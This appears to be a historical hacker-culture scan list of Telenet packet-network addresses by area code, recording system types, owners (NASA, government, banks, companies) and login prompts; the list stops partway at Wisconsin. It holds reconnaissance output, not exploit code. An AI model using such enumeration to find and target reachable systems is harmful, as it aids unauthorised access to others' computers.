|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
20 PLEASE ENTER /LOGIN
|
|||
|
* 21
|
|||
|
24 The Source
|
|||
|
26 DNAMD1 Online
|
|||
|
28 The Source
|
|||
|
31 PRIME NUSA
|
|||
|
33 VOS United Communications Corp
|
|||
|
38 The Source
|
|||
|
* 39
|
|||
|
* 43
|
|||
|
45 RNN/NGW
|
|||
|
* 46
|
|||
|
47 The Source
|
|||
|
48 The Source
|
|||
|
49 The Source
|
|||
|
$ 52 PRIME
|
|||
|
56 RNN/NGW
|
|||
|
57 RNN/NGW
|
|||
|
58 PRIME CDA Online Services
|
|||
|
* 60a
|
|||
|
* 61a
|
|||
|
$ 63 PRIME PINET
|
|||
|
$ 65 PRIME APHISB
|
|||
|
74 (I)nt (D)atapac (T)elenet
|
|||
|
* 77
|
|||
|
* 78
|
|||
|
100 VOS United Communications Corp
|
|||
|
102 CYBER Arbitron
|
|||
|
103 " "
|
|||
|
104 " "
|
|||
|
105 " "
|
|||
|
106 " "
|
|||
|
107 " "
|
|||
|
108 " "
|
|||
|
109 " "
|
|||
|
110 " "
|
|||
|
111 " "
|
|||
|
112 " "
|
|||
|
113 " "
|
|||
|
114 " "
|
|||
|
115 " "
|
|||
|
116 " "
|
|||
|
$ 125 VAX
|
|||
|
132 ElHill 3
|
|||
|
140 VAX
|
|||
|
141 USER ID
|
|||
|
$ 150 VAX
|
|||
|
156 The Source
|
|||
|
157 The Source
|
|||
|
158 The Source
|
|||
|
159 The Source
|
|||
|
162 The Source
|
|||
|
* 165
|
|||
|
$ 167 VAX Manger Support System
|
|||
|
$ 68 VAX
|
|||
|
170 VOS United Communications Corp
|
|||
|
$ 173 ID
|
|||
|
$ 175 ID
|
|||
|
$ 176 HP-3000
|
|||
|
178 CYBER Arbitron
|
|||
|
$ 243 PRIME
|
|||
|
$ 245 PRIME
|
|||
|
$ 246 PRIME
|
|||
|
$ 247 PRIME
|
|||
|
249 VAX Tamsco
|
|||
|
301 PRIME Primecom Network
|
|||
|
302 " " "
|
|||
|
303 " " "
|
|||
|
307 PRIME
|
|||
|
330 PRIME Primecom Network
|
|||
|
331 " " "
|
|||
|
332 " " "
|
|||
|
333 " " "
|
|||
|
334 " " "
|
|||
|
335 " " "
|
|||
|
336 VAX
|
|||
|
337 Dialcom MHS
|
|||
|
341 PRIME Primecom Network
|
|||
|
342 " " "
|
|||
|
343 " " "
|
|||
|
344 " " "
|
|||
|
345 " " "
|
|||
|
346 " " "
|
|||
|
350 " " "
|
|||
|
351 " " "
|
|||
|
352 " " "
|
|||
|
353 " " "
|
|||
|
354 " " "
|
|||
|
356 " " "
|
|||
|
357 " " "
|
|||
|
358 " " "
|
|||
|
361 " " "
|
|||
|
363 " " "
|
|||
|
364 " " "
|
|||
|
390 " " "
|
|||
|
391 " " "
|
|||
|
392 " " "
|
|||
|
393 " " "
|
|||
|
394 " " "
|
|||
|
396 " " "
|
|||
|
398 " " "
|
|||
|
399 " " "
|
|||
|
408 The Source
|
|||
|
430 The Source
|
|||
|
435 The Source
|
|||
|
$ 440 INVALID-SW-CHARS
|
|||
|
* 441
|
|||
|
* 442
|
|||
|
* 443
|
|||
|
* 444
|
|||
|
* 445
|
|||
|
* 446
|
|||
|
* 447
|
|||
|
* 448
|
|||
|
* 449
|
|||
|
* 450
|
|||
|
* 451
|
|||
|
* 452
|
|||
|
$ 453 VAX
|
|||
|
$ 454 PRIME FRED
|
|||
|
1001 Campus 2000
|
|||
|
1002 Telecom Gold
|
|||
|
1004 Telecom Gold
|
|||
|
1017 Rev.19
|
|||
|
1018 Telecom Gold
|
|||
|
1040 VAX British Telecom
|
|||
|
1041 " "
|
|||
|
1047 " "
|
|||
|
1049 " "
|
|||
|
1050 " "
|
|||
|
1051 " "
|
|||
|
1052 " "
|
|||
|
1053 " "
|
|||
|
1054 " "
|
|||
|
1055 " "
|
|||
|
1057 " "
|
|||
|
1058 " "
|
|||
|
1060 UNIX Telecom Gold
|
|||
|
1061 " "
|
|||
|
1068 " "
|
|||
|
1069 " "
|
|||
|
1072 Telecom Gold
|
|||
|
1073 "
|
|||
|
1074 "
|
|||
|
1075 "
|
|||
|
1076 "
|
|||
|
1077 "
|
|||
|
1078 "
|
|||
|
1079 "
|
|||
|
1080 "
|
|||
|
1081 "
|
|||
|
1082 "
|
|||
|
1083 "
|
|||
|
1084 "
|
|||
|
1085 "
|
|||
|
1086 "
|
|||
|
1087 "
|
|||
|
1088 "
|
|||
|
1089 "
|
|||
|
1090 "
|
|||
|
1200a "
|
|||
|
2030 ID
|
|||
|
2031 "
|
|||
|
2032 "
|
|||
|
2033 "
|
|||
|
|
|||
|
|
|||
|
302--DELAWARE--ADDRESSES SCANNED: 0-300
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 31 ID
|
|||
|
* 32
|
|||
|
$ 41 (Tymnet clone)
|
|||
|
|
|||
|
|
|||
|
303-COLORADO--ADDRESSES SCANNED: 0-500
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
7 NCAR
|
|||
|
8 NCAR
|
|||
|
$ 21 PC Pursuit Dialer (2400)
|
|||
|
38 PRIME SL
|
|||
|
$ 50 AOS
|
|||
|
$ 52 PRIME DWRC
|
|||
|
$ 54 AOS
|
|||
|
$ 57 PRIME DENVER
|
|||
|
$ 60 AOS
|
|||
|
* 64
|
|||
|
* 65
|
|||
|
$ 66 AOS
|
|||
|
$ 68 AOS
|
|||
|
$ 69 AOS
|
|||
|
$ 78 AOS
|
|||
|
100 enter switch characters
|
|||
|
$ 114 PC Pursuit Dialer (300)
|
|||
|
$ 115 PC Pursuit Dialer (1200)
|
|||
|
120 PRIME SAMSON
|
|||
|
$ 130 AOS
|
|||
|
131 Petroleum Info Network
|
|||
|
$ 138 AOS
|
|||
|
140 X29 Password:
|
|||
|
$ 145 AOS
|
|||
|
$ 146 AOS
|
|||
|
$ 149 ID
|
|||
|
* 152
|
|||
|
$ 154 AOS
|
|||
|
$ 155 AOS
|
|||
|
$ 156 AOS
|
|||
|
$ 157 AOS
|
|||
|
$ 158 AOS
|
|||
|
$ 159 AOS
|
|||
|
$ 168 AOS
|
|||
|
$ 169 AOS
|
|||
|
$ 172 AOS
|
|||
|
$ 176 AOS
|
|||
|
$ 177 AOS
|
|||
|
* 179
|
|||
|
* 200
|
|||
|
$ 231 AOS
|
|||
|
$ 239 AOS
|
|||
|
* 244
|
|||
|
* 250
|
|||
|
$ 253 AOS
|
|||
|
* 256
|
|||
|
$ 257 AOS
|
|||
|
* 266
|
|||
|
314
|
|||
|
335 PRIME UDEN01
|
|||
|
$ 342 HP-3000
|
|||
|
350 VAX
|
|||
|
$ 353 AOS
|
|||
|
$ 354 AOS
|
|||
|
$ 355 AOS
|
|||
|
$ 356 AOS
|
|||
|
$ 434 AOS
|
|||
|
* 463
|
|||
|
$ 470 AOS
|
|||
|
|
|||
|
|
|||
|
304--WEST VIRGINIA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 AOS
|
|||
|
$ 31 AOS
|
|||
|
$ 32 ID
|
|||
|
* 34
|
|||
|
* 41
|
|||
|
100 WVNET
|
|||
|
130 WVNET
|
|||
|
|
|||
|
|
|||
|
305--FLORIDA--ADDRESSES SCANNED: 0-900
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
4 Martin Marietta
|
|||
|
20
|
|||
|
22 HP-3000
|
|||
|
35 ENTER SWITCH CHARACTERS
|
|||
|
* 51
|
|||
|
* 52
|
|||
|
* 56
|
|||
|
63 HP-3000
|
|||
|
* 67
|
|||
|
* 68
|
|||
|
* 69
|
|||
|
73 HP-3000
|
|||
|
$ 120 PC Pursuit Dialer (300)
|
|||
|
$ 121 PC Pursuit Dialer (1200)
|
|||
|
$ 122 PC Pursuit Dialer (2400)
|
|||
|
129 HP-3000
|
|||
|
* 135
|
|||
|
136
|
|||
|
137
|
|||
|
138 HP-3000
|
|||
|
140
|
|||
|
148 VAX
|
|||
|
156 VAX EVF
|
|||
|
159 VU/TEXT
|
|||
|
* 235
|
|||
|
* 236
|
|||
|
239 VM/370
|
|||
|
$ 240 HP-3000
|
|||
|
248 VAX
|
|||
|
255 VAX
|
|||
|
* 262
|
|||
|
* 263
|
|||
|
$ 268
|
|||
|
278 PACKET/74
|
|||
|
330a
|
|||
|
* 337
|
|||
|
$ 338 VAX AIM
|
|||
|
$ 345 PRIME MIAMI
|
|||
|
* 350
|
|||
|
* 351
|
|||
|
* 360
|
|||
|
* 361
|
|||
|
365 Martin Marietta
|
|||
|
$ 370 No access to this DTE
|
|||
|
371 VAX (In Spanish)
|
|||
|
* 433
|
|||
|
570
|
|||
|
590
|
|||
|
623 Telenet Async to 3270
|
|||
|
644
|
|||
|
|
|||
|
|
|||
|
312--ILLINOIS--ADDRESSES SCANNED: 0-1200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 24 PC Pursuit Dialer (2400)
|
|||
|
34 Your entry is incorrect
|
|||
|
$ 35 VTAM/TSO
|
|||
|
* 37
|
|||
|
41 Your entry is incorrect
|
|||
|
42 #
|
|||
|
43 #
|
|||
|
46 SYSTEM SECURITY STANDARDS
|
|||
|
63 PEOPLE/LINK
|
|||
|
$ 64 Purdue ISN
|
|||
|
$ 65 COMMAND UNRECOGNIZED
|
|||
|
70 PEOPLE/LINK
|
|||
|
* 71
|
|||
|
* 77
|
|||
|
* 78
|
|||
|
101a
|
|||
|
108a
|
|||
|
121 enter system id--
|
|||
|
131 VM/370
|
|||
|
$ 133
|
|||
|
135 PEOPLE/LINK
|
|||
|
142 HP-3000
|
|||
|
$ 146 HP-3000
|
|||
|
$ 147 ONLINE
|
|||
|
150 Please enter SUBSCRIBERID
|
|||
|
$ 158 HP-3000
|
|||
|
159 Please enter SUBSCRIBERID
|
|||
|
160 PASSWORD
|
|||
|
161 "
|
|||
|
162 "
|
|||
|
163 "
|
|||
|
$ 166 ONLINE
|
|||
|
$ 170 VAX SKMIC4
|
|||
|
219 enter system id--
|
|||
|
222 PASSWORD
|
|||
|
227 PASSWORD
|
|||
|
$ 231 USSMSG02
|
|||
|
233 PASSWORD
|
|||
|
235 PASSWORD
|
|||
|
* 245
|
|||
|
247
|
|||
|
* 253
|
|||
|
* 254
|
|||
|
$ 255 Enter host access code:
|
|||
|
256 Please LOGIN
|
|||
|
258 ID:
|
|||
|
* 263
|
|||
|
289 Baxter ASAP System
|
|||
|
300a WANG VS SREA
|
|||
|
301a " "
|
|||
|
302a " "
|
|||
|
303a " "
|
|||
|
304a " "
|
|||
|
305a " "
|
|||
|
306a " "
|
|||
|
307a " "
|
|||
|
308a " "
|
|||
|
309a " "
|
|||
|
310a " "
|
|||
|
311a " "
|
|||
|
312a " "
|
|||
|
313a " "
|
|||
|
314a " "
|
|||
|
315a " "
|
|||
|
316a " "
|
|||
|
317a " "
|
|||
|
318a " "
|
|||
|
319a " "
|
|||
|
* 338
|
|||
|
* 341
|
|||
|
* 354
|
|||
|
370 PEOPLE/LINK
|
|||
|
373a
|
|||
|
374 Information Resources
|
|||
|
375 VAX Marketing Fact Book
|
|||
|
378 Baxter ASAP System
|
|||
|
* 391
|
|||
|
* 392
|
|||
|
* 394
|
|||
|
* 395
|
|||
|
* 397
|
|||
|
$ 398 MHP201A
|
|||
|
400 Baxter ASAP System
|
|||
|
401 "
|
|||
|
402 "
|
|||
|
403 "
|
|||
|
404 "
|
|||
|
406 COMMAND UNRECOGNIZED
|
|||
|
$ 410 PC Pursuit Dialer (300)
|
|||
|
$ 411 PC Pursuit Dialer (1200)
|
|||
|
* 420
|
|||
|
* 421
|
|||
|
$ 422 MHP201A
|
|||
|
* 425
|
|||
|
* 427
|
|||
|
* 428
|
|||
|
* 431
|
|||
|
$ 434 Purdue ISN
|
|||
|
$ 435 HP-3000
|
|||
|
$ 439 Purdue ISN
|
|||
|
* 442
|
|||
|
* 469
|
|||
|
* 475
|
|||
|
* 476
|
|||
|
* 477
|
|||
|
520 R59X01 login:
|
|||
|
521 "
|
|||
|
522 "
|
|||
|
523 "
|
|||
|
524 "
|
|||
|
525 "
|
|||
|
526 PASSWORD
|
|||
|
527 PASSWORD
|
|||
|
528 PASSWORD
|
|||
|
532 VAX OMNI
|
|||
|
534
|
|||
|
535
|
|||
|
536
|
|||
|
548
|
|||
|
$ 571
|
|||
|
$ 572
|
|||
|
$ 575
|
|||
|
$ 576
|
|||
|
$ 577
|
|||
|
$ 580
|
|||
|
$ 581
|
|||
|
$ 590
|
|||
|
$ 591
|
|||
|
$ 592
|
|||
|
$ 593
|
|||
|
$ 594
|
|||
|
$ 595
|
|||
|
$ 596
|
|||
|
$ 597
|
|||
|
583
|
|||
|
584
|
|||
|
586
|
|||
|
587
|
|||
|
588
|
|||
|
589
|
|||
|
655 Baxter ASAP System
|
|||
|
740 Telenet Async to 3270
|
|||
|
741a Telenet Async to 3270
|
|||
|
* 759
|
|||
|
* 761
|
|||
|
* 762
|
|||
|
* 763
|
|||
|
* 764
|
|||
|
* 766
|
|||
|
* 767
|
|||
|
* 768
|
|||
|
* 769
|
|||
|
$ 770 Telenet Async to 3270
|
|||
|
$ 771a Telenet Async to 3270
|
|||
|
$ 772 Telenet Async to 3270
|
|||
|
1030 VAX First Options of Chicago
|
|||
|
1031 VAX "
|
|||
|
1032 VAX "
|
|||
|
1033 VAX "
|
|||
|
1034 VAX "
|
|||
|
1035 VAX "
|
|||
|
1036 VAX "
|
|||
|
1037 VAX "
|
|||
|
1038 VAX "
|
|||
|
1112
|
|||
|
1127
|
|||
|
1130 R52XO1 login:
|
|||
|
1131 "
|
|||
|
1132 "
|
|||
|
1133 "
|
|||
|
1134 "
|
|||
|
1135 "
|
|||
|
1136 "
|
|||
|
1137 "
|
|||
|
1138 "
|
|||
|
1139 "
|
|||
|
1140 "
|
|||
|
1141 "
|
|||
|
1142 "
|
|||
|
1143 "
|
|||
|
1144 "
|
|||
|
|
|||
|
|
|||
|
313--MICHIGAN--ADDRESSES SCANNED: 0-400
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 24 PC Pursuit Dialer (2400)
|
|||
|
25 COMSHARE
|
|||
|
$ 30 VAX GVN VAX CLUSTER
|
|||
|
37 enter system id--
|
|||
|
38 "
|
|||
|
40 Autonet
|
|||
|
41 Autonet
|
|||
|
43 enter system id--
|
|||
|
50 enter system id--
|
|||
|
61 enter system id--
|
|||
|
62 merit:x.25
|
|||
|
64 Telenet Async to 3270
|
|||
|
65a Telenet Async to 3270
|
|||
|
68 (I)nternational (D)atapac
|
|||
|
* 75
|
|||
|
$ 77 ID
|
|||
|
82 NTUSSTB5
|
|||
|
83 "
|
|||
|
85 enteer system id--
|
|||
|
119 PASSWORD
|
|||
|
120 "
|
|||
|
145 enter your access code?
|
|||
|
146 "
|
|||
|
148 ENTER YOUR SUBSCRIBERID;
|
|||
|
160 PASSWORD
|
|||
|
161 "
|
|||
|
162 "
|
|||
|
164 VU/TEXT
|
|||
|
165 enter user ID
|
|||
|
172 "
|
|||
|
173 VAX IPP
|
|||
|
202 merit:x.25
|
|||
|
210a
|
|||
|
$ 214 PC Pursuit Dialer (300)
|
|||
|
$ 216 PC Pursuit Dialer (1200)
|
|||
|
* 231
|
|||
|
233
|
|||
|
239 UNIX GTE
|
|||
|
* 245
|
|||
|
249
|
|||
|
250 HP-3000
|
|||
|
252
|
|||
|
255 $$50 DEVICE TYPE ID
|
|||
|
256 "
|
|||
|
* 257
|
|||
|
346 ?1040
|
|||
|
347 "
|
|||
|
|
|||
|
|
|||
|
314--MISSOURI--ADDRESSES SCANNED: 0-300
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 5 PC Pursuit Dialer (2400)
|
|||
|
$ 20 PC Pursuit Dialer (1200)
|
|||
|
$ 33 AOS
|
|||
|
$ 35 AOS
|
|||
|
$ 36 AOS
|
|||
|
$ 37 AOS
|
|||
|
$ 38 AOS
|
|||
|
* 39
|
|||
|
$ 40 AOS
|
|||
|
$ 45 AOS
|
|||
|
* 50
|
|||
|
* 57
|
|||
|
131 MDCIS
|
|||
|
132 Type User Name
|
|||
|
$ 157 PRIME JEFCTY
|
|||
|
$ 179 ID
|
|||
|
* 240
|
|||
|
* 241
|
|||
|
* 242
|
|||
|
* 243
|
|||
|
* 244
|
|||
|
* 245
|
|||
|
* 246
|
|||
|
* 247
|
|||
|
* 248
|
|||
|
* 249
|
|||
|
* 250
|
|||
|
* 251
|
|||
|
* 252
|
|||
|
* 253
|
|||
|
|
|||
|
|
|||
|
315--NEW YORK--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
20 enter system id
|
|||
|
$ 32 COMMAND UNRECOGNIZED
|
|||
|
$ 50 enter terminal type
|
|||
|
$ 130 ID
|
|||
|
134 enter system id
|
|||
|
135 "
|
|||
|
136 "
|
|||
|
$ 137 GTE CAMILLUS NY
|
|||
|
$ 149 GTE CAMILLUS NY
|
|||
|
150 GTE CAMILLUS NY
|
|||
|
151 "
|
|||
|
154
|
|||
|
155
|
|||
|
156 5294 Controller
|
|||
|
157a 5294 Controller
|
|||
|
|
|||
|
|
|||
|
317--INDIANA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 ID
|
|||
|
* 31
|
|||
|
32 PRC ACF/VTAM
|
|||
|
34 PRC ACF/VTAM
|
|||
|
41
|
|||
|
|
|||
|
|
|||
|
318--LOUISIANA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 AOS
|
|||
|
* 57
|
|||
|
|
|||
|
|
|||
|
321--SPAN--ADDRESSES SCANNED: VARIOUS
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
104 NASA Packet Network
|
|||
|
150 PRIME
|
|||
|
$ 160 VAX NASA/MFSC
|
|||
|
1030 VAX MIPS10
|
|||
|
1036 VAX US GOVERNMENT VAX
|
|||
|
1056 PRIME
|
|||
|
2023 PRIME
|
|||
|
3035 VAX FLYBOY
|
|||
|
4027a ALPHA 5
|
|||
|
* 7034
|
|||
|
7036 LUT 3.2>
|
|||
|
$ 7055 VAX
|
|||
|
7064 PRIME
|
|||
|
|
|||
|
|
|||
|
334--UNKNOWN--ADDRESSES SCANNED: VARIOUS
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 100 National Computer Center
|
|||
|
$ 102 "
|
|||
|
$ 103 Enter Terminal id?
|
|||
|
$ 130 NARDAC
|
|||
|
$ 131 NARDAC
|
|||
|
* 200
|
|||
|
$ 500
|
|||
|
* 560
|
|||
|
|
|||
|
|
|||
|
335--UNKNOWN--ADDRESSES SCANNED: VARIOUS
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
* 12
|
|||
|
* 13
|
|||
|
* 110
|
|||
|
* 111
|
|||
|
* 120
|
|||
|
* 121
|
|||
|
* 122
|
|||
|
* 123
|
|||
|
* 124
|
|||
|
* 210
|
|||
|
|
|||
|
|
|||
|
336--UNKNOWN--ADDRESSES SCANNED: 0-700
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 21 VAX USDA
|
|||
|
$ 22 VAX "
|
|||
|
$ 40 AOS
|
|||
|
159 VAX
|
|||
|
$ 165 VAX VSFCA
|
|||
|
173 Unisys Telcom
|
|||
|
174 "
|
|||
|
179 "
|
|||
|
* 180
|
|||
|
$ 181
|
|||
|
$ 182 FCCC
|
|||
|
* 183
|
|||
|
$ 185 IVeASID@CVTTAUD@bhUeAg
|
|||
|
$ 200 AOS
|
|||
|
$ 240 PRIME
|
|||
|
$ 250 AOS
|
|||
|
$ 260 AOS
|
|||
|
* 604
|
|||
|
|
|||
|
|
|||
|
337--UNKNOWN--ADDRESSES SCANNED: VARIOUS
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 10a
|
|||
|
$ 15a
|
|||
|
* 100
|
|||
|
* 101
|
|||
|
$ 110 V28048DA
|
|||
|
$ 120 AOS
|
|||
|
* 200
|
|||
|
* 201
|
|||
|
* 202
|
|||
|
* 203
|
|||
|
|
|||
|
|
|||
|
343--BURROUGHS--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
190 BURROUGHS
|
|||
|
|
|||
|
|
|||
|
401--RHODE ISLAND--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 42 ID
|
|||
|
* 50
|
|||
|
612 Modem City
|
|||
|
|
|||
|
|
|||
|
402--NEBRASKA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
40 ID
|
|||
|
* 52
|
|||
|
55 Dynix
|
|||
|
* 56
|
|||
|
$ 60
|
|||
|
64a
|
|||
|
|
|||
|
|
|||
|
404--GEORGIA--ADDRESSES SCANNED: 0-300
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 22 PC Pursuit Dialer (2400)
|
|||
|
* 33
|
|||
|
$ 36 AOS
|
|||
|
$ 37 AOS
|
|||
|
* 40
|
|||
|
* 47
|
|||
|
$ 72 ID
|
|||
|
$ 113 PC Pursuit Dialer (300)
|
|||
|
$ 114 PC Pursuit Dialer (1200)
|
|||
|
$ 124
|
|||
|
* 127
|
|||
|
$ 128
|
|||
|
$ 130
|
|||
|
* 136
|
|||
|
* 175
|
|||
|
* 230
|
|||
|
|
|||
|
|
|||
|
405--OKLAHOMA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
19
|
|||
|
$ 20
|
|||
|
* 32
|
|||
|
* 33
|
|||
|
34
|
|||
|
45 Hertz
|
|||
|
46 C@
|
|||
|
|
|||
|
|
|||
|
406--MONTANA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 32 AOS
|
|||
|
$ 33 AOS
|
|||
|
$ 37 AOS
|
|||
|
$ 44 AOS
|
|||
|
$ 45 AOS
|
|||
|
$ 46 AOS
|
|||
|
$ 47 AOS
|
|||
|
$ 48 AOS
|
|||
|
$ 51 AOS
|
|||
|
$ 52 AOS
|
|||
|
$ 53 AOS
|
|||
|
$ 58 AOS
|
|||
|
$ 61 AOS
|
|||
|
$ 62 AOS
|
|||
|
$ 63 AOS
|
|||
|
$ 64 AOS
|
|||
|
$ 65 AOS
|
|||
|
$ 75 AOS
|
|||
|
* 125
|
|||
|
$ 131 AOS
|
|||
|
$ 132 AOS
|
|||
|
$ 133 AOS
|
|||
|
* 140
|
|||
|
* 142
|
|||
|
* 145
|
|||
|
* 148
|
|||
|
$ 150 AOS
|
|||
|
$ 155 AOS
|
|||
|
$ 157 AOS
|
|||
|
$ 158 AOS
|
|||
|
$ 159 AOS
|
|||
|
$ 161 AOS
|
|||
|
$ 162 AOS
|
|||
|
$ 163 AOS
|
|||
|
$ 176 AOS
|
|||
|
$ 178 AOS
|
|||
|
|
|||
|
|
|||
|
408--CALIFORNIA--ADDRESSES SCANNED: 0-700
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 21 PC Pursuit Dialer (2400)
|
|||
|
$ 38 AOS
|
|||
|
$ 41 AOS
|
|||
|
* 49
|
|||
|
* 53
|
|||
|
58a
|
|||
|
62 TACL1>
|
|||
|
* 76
|
|||
|
84a
|
|||
|
$ 110 PC Pursuit Dialer (300)
|
|||
|
$ 111 PC Pursuit Dialer (1200)
|
|||
|
121 HP-3000
|
|||
|
126a
|
|||
|
$ 133 UNIX
|
|||
|
$ 135 SCS-SALES
|
|||
|
* 149
|
|||
|
154 PRIME GREGOR
|
|||
|
$ 159 VAX
|
|||
|
$ 174 AOS
|
|||
|
* 175
|
|||
|
235 Global Weather MU2
|
|||
|
238 UNIX
|
|||
|
$ 257 VAX MATRA DESIGN
|
|||
|
* 260
|
|||
|
* 261
|
|||
|
264 Portal
|
|||
|
* 267
|
|||
|
* 268
|
|||
|
* 271
|
|||
|
274 BBB Version 20
|
|||
|
280a
|
|||
|
304 Call:
|
|||
|
311 AMDAHL Network
|
|||
|
312 CCC110A
|
|||
|
313 AMDAHL Network
|
|||
|
314 "
|
|||
|
315 "
|
|||
|
$ 342 UNIX
|
|||
|
$ 344 VAX ANDO
|
|||
|
346 UNIX
|
|||
|
$ 349 PCI (Tymnet clone)
|
|||
|
352
|
|||
|
$ 357 PCI (Tymnet clone)
|
|||
|
$ 358 "
|
|||
|
$ 359 "
|
|||
|
* 371
|
|||
|
$ 375 PCI (Tymnet clone)
|
|||
|
$ 376 "
|
|||
|
$ 377 "
|
|||
|
378 UNIX Sunlink
|
|||
|
434 COMMAND UNRECOGNIZED
|
|||
|
435
|
|||
|
$ 439 PCI (Tymnet clone)
|
|||
|
$ 440 "
|
|||
|
$ 444 HP-3000
|
|||
|
$ 445 VAX LAUREL
|
|||
|
$ 457 HP-3000
|
|||
|
$ 461 AOS
|
|||
|
$ 462 AOS
|
|||
|
$ 463 AOS
|
|||
|
* 468
|
|||
|
$ 469 AOS
|
|||
|
* 479
|
|||
|
* 530
|
|||
|
* 531
|
|||
|
* 532
|
|||
|
$ 534 HP-3000
|
|||
|
$ 537 HP-3000
|
|||
|
$ 538 HP-3000
|
|||
|
* 560
|
|||
|
$ 561 AOS
|
|||
|
* 562
|
|||
|
* 563
|
|||
|
* 564
|
|||
|
* 565
|
|||
|
* 566
|
|||
|
* 567
|
|||
|
$ 568 AOS
|
|||
|
$ 569 AOS
|
|||
|
* 570
|
|||
|
* 571
|
|||
|
* 572
|
|||
|
* 573
|
|||
|
* 574
|
|||
|
$ 610 HP-3000
|
|||
|
619 HP-3000
|
|||
|
* 620
|
|||
|
627 Fujitsu America
|
|||
|
|
|||
|
|
|||
|
410--RCA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
0 RCA
|
|||
|
|
|||
|
|
|||
|
412--PENNSYLVANIA--ADDRESSES SCANNED: 0-800
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
33 Enter Usercode:
|
|||
|
$ 34 LORD Corporation
|
|||
|
$ 35a Telenet Async to 3270
|
|||
|
42 Federated Edge
|
|||
|
43 "
|
|||
|
47 Enter Logon
|
|||
|
48 "
|
|||
|
49 "
|
|||
|
51 "
|
|||
|
52 "
|
|||
|
55 COMMAND UNRECOGNIZED
|
|||
|
61
|
|||
|
63
|
|||
|
67 enter terminal id
|
|||
|
* 68
|
|||
|
79 Federated Edge
|
|||
|
117 VAX
|
|||
|
* 122
|
|||
|
276 COMMAND UNRECOGNIZED
|
|||
|
277 "
|
|||
|
278 "
|
|||
|
279 "
|
|||
|
* 331
|
|||
|
340 Mellon Bank
|
|||
|
341 C@
|
|||
|
342 COMMAND UNRECOGNIZED
|
|||
|
349 *** ENTER LOGON
|
|||
|
352 "
|
|||
|
354 VAX
|
|||
|
355 C@
|
|||
|
360 VAX
|
|||
|
430
|
|||
|
431
|
|||
|
671 Carnegie-Mellon MICOM-B
|
|||
|
|
|||
|
|
|||
|
413--MASSACHUSETTS--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 21 TW81
|
|||
|
|
|||
|
|
|||
|
414--WISCONSIN--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
